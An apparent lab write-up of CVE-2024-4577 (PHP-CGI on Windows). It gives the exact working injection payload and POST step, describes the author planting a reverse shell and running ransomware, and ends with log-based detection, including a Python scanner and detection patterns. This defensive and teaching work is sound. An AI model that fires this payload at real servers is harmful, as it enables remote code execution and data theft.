CVE-2024-4577

Overview

CVE-2024-4577 is a security vulnerability that affects PHP servers in the following versions:

  • PHP 8.3.x (8.3.8 and earlier)
  • PHP 8.2.x (8.2.20 and earlier)
  • PHP 8.1.x (8.1.29 and earlier)
  • All versions prior to 8.0
  • Unsupported versions 7.x and 5.x

This vulnerability is a remote code execution (RCE) flaw that occurs when PHP is run in CGI (Common Gateway Interface) mode on Windows servers. The issue arises from Windows "Best Fit" character mapping, which in some language settings converts certain non-ASCII characters into ASCII equivalents. As a result, characters supplied in the request are passed to the PHP CGI binary and parsed as PHP command-line options, allowing an attacker to inject configuration directives and execute arbitrary code on the server.

Exploitation Process

  1. Initial Attack Vector: To exploit the vulnerability, append the following string to the URL of the vulnerable site:

     ?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

     Use Burp Suite to intercept this request and send it to the Repeater.

  2. Change the Request Method: Convert the intercepted request to a POST method and send a simple PHP snippet in the request body, for example:

     <?php phpinfo();

Continuation of the Exploitation Process

If the server is vulnerable, the response will contain the phpinfo() output, including the PHP version and configuration.

Executing Malicious Code

Various methods can be applied depending on the attacker's objectives. My preferred method was to define an execution in the Windows startup directory using Burp Suite. I converted the reverseshell.ps1 script into an executable (exe) and placed it there.

Ransomware Deployment

Similarly, I uploaded the ransomware.ps1 file to the system and successfully exfiltrated documents, leaving behind only their encrypted versions.

Analysis Phase

Before starting the attack, it is necessary to activate the 4688 logs. Upon analyzing the 4688 security logs on my Windows machine, I found that the attack originated from Apache under XAMPP. When I checked the Access.log files, I encountered an abnormal request that returned a 200 status code, prompting me to search for this URL in my browser. I identified the vulnerability and took precautions, such as updating the PHP version or disabling the PHP CGI feature.
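The access-log review described above, as an added example that is not part of the original write-up: a small Python scanner that reads Apache access-log lines (combined log format) and flags requests whose query string carries the soft-hyphen byte (0xAD, the `%AD` seen in the payload) as an option prefix, or names the php.ini directives used in the payload. The log lines are constructed for this example, and the function name `scan_access_log` is my own; a real deployment would read XAMPP's access.log from disk instead of the embedded sample.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample of an Apache access.log (combined format). Line 2 carries the
# payload quoted in the write-up, line 3 a partial variant, line 4 a benign request
# that contains ordinary ASCII hyphens and must NOT be flagged.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Jun/2024:12:00:01 +0300] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jun/2024:12:00:07 +0300] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 8811 "-" "curl/8.4.0"
10.0.0.9 - - [10/Jun/2024:12:00:09 +0300] "GET /index.php?%ADd+allow_url_include%3d1 HTTP/1.1" 200 512 "-" "curl/8.4.0"
10.0.0.12 - - [10/Jun/2024:12:01:00 +0300] "GET /search.php?q=php-cgi+-d HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.12 - - [10/Jun/2024:12:01:05 +0300] "GET /docs.php?page=readme HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Fields of a combined-format line up to the status code; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# A soft hyphen (0xAD) at the start of a space-separated argument, followed by a
# letter, is the shape of a php-cgi option such as "-d" after Best-Fit mapping.
SOFT_HYPHEN_OPT = re.compile(rb'(?:^|\s)\xad[A-Za-z]')

# php.ini directives that appear in the payload; their presence in a query
# string is suspicious on its own, regardless of how the option prefix is encoded.
INI_DIRECTIVES = (b'allow_url_include', b'auto_prepend_file')


def scan_access_log(text):
    """Return a list of findings for access-log lines that look like CVE-2024-4577 probes."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m or '?' not in m.group('target'):
            continue
        _path, query = m.group('target').split('?', 1)
        # Form-encoded '+' is a space; percent-decode to raw bytes so 0xAD survives.
        raw = unquote_to_bytes(query.replace('+', ' '))
        reasons = []
        if SOFT_HYPHEN_OPT.search(raw):
            reasons.append('soft hyphen (0xAD) used as a PHP option prefix')
        for directive in INI_DIRECTIVES:
            if directive in raw.lower():
                reasons.append(f'php.ini directive {directive.decode()} in query string')
        if reasons:
            findings.append({
                'line': lineno,
                'ip': m.group('ip'),
                'timestamp': m.group('ts'),
                'method': m.group('method'),
                'status': int(m.group('status')),
                'reasons': reasons,
            })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line']}: {f['ip']} {f['method']} -> {f['status']}: {'; '.join(f['reasons'])}")
```

A 200 status on a flagged line, as the write-up observed, means the request was served rather than rejected, so those entries are the ones to correlate with 4688 events whose parent process is the Apache httpd from XAMPP.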

Security Log Examination

Since the ransomware I created was not obfuscated, my code is visible in the PowerShell logs. This shows how I encrypted the data. To recover my data, I run the encoded.ps1 file.

Conclusion

This simulation highlights the potential risks associated with CVE-2024-4577 and emphasizes the importance of securing PHP installations. Keeping PHP updated and preventing misconfigurations of CGI settings can effectively reduce such vulnerabilities.